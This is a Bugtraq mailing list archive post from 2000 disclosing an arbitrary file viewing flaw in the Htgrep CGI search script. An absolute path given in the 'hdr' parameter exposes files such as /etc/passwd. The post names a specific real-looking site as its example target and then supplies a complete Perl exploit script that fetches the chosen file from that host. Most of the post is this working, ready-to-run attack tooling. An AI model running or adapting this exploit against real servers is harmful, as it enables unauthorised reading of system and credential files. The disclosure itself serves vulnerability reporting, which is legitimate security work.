Bugtraq mailing list archives

Previous By Date Next
Previous By Thread Next

Htgrep CGI Arbitrary File Viewing Vulnerability

From: n30 <n30 () GMX CO UK>
Date: Thu, 17 Aug 2000 13:41:42 -0000
Software:       Htgrep
URL:            http://www.iam.unibe.ch/~scg/Src/Doc/
Version:        All Versions
Platforms:      Unix maybe Winnt?
Author status:  Notified

Summary:

        Any remote user can view arbitrary files on the 
system with the
privileges of the web user

Vulnerability:

        The CGI allows a user to specify a header and 
footer file to be 
appended to the search output, this file should be located 
in the wwwroot
which is specified in the script itself. Any attempt to 
specify a header
or footer file by using backwards directory referencing is 
trapped. Although
it is possible to specify a file using an absolute path.

Exploit:

   
http://www.dematel.com/cgibin/htgrep/file=index.html&hdr=/et
c/passwd

        The File /etc/passwd will be displayed instead of 
the default header
        file.

Fixes:

        The author has been notified, it is likely that an 
update will be
available shortly.

n30
n30 () gmx co uk

Exploit Follows:

#!/usr/local/bin/perl 
#
# Htgrep EXPLOIT Script by n30 17/8/2000
#
# For: Unix/Linux all Distro's
#      maybe Winnt?? anyone??
#
# Versions: All upto latest: htgrep v3.0
#
# Info: to find the version number being used:
#
#       www.server.com/cgi-bin/htgrep/version
#
# Some ppl use a wrapper for the script thusly
# eliminating the file argument, the sploit will
# still werk just add &hdr=<filename> to the end :-)
#
# if &isindex=<text> is present in the URL REMOVE IT!!!
# or else the exploit won't werk :-)
#
# Mail : n30 () gmx co uk

use strict;
use LWP::UserAgent;
use HTTP::Request;
use HTTP::Response;
my $ua = new LWP::UserAgent;

# *************************************************
my $TargetHost="www.dematel.com";
my $TargetPath="/cgibin/htgrep";
# SearchFile can commonly be index.html or some other file 
in the wwwroot
my $SearchFile="index.html";
# FiletoGet ?? think for ur self :-)
my $FiletoGet="/etc/passwd";
# **************************************************

my 
$url="http://".$TargetHost.$TargetPath."/file=$SearchFile&hd
r=$FiletoGet";

 print("\nHtgrep Arbitrary File Reading Vulnerability 
EXPLOIT /n30\n\n");

 print("URL: $url\n\n");

 my $request = new HTTP::Request('GET', $url);
 my $response = $ua->request($request);
 if ($response->is_success) {
      print $response->content;
 } else {
      print $response->error_as_HTML;
 }

#                 Definitely NOT 
Hack.co.za                       #
Previous By Date Next
Previous By Thread Next

Current thread: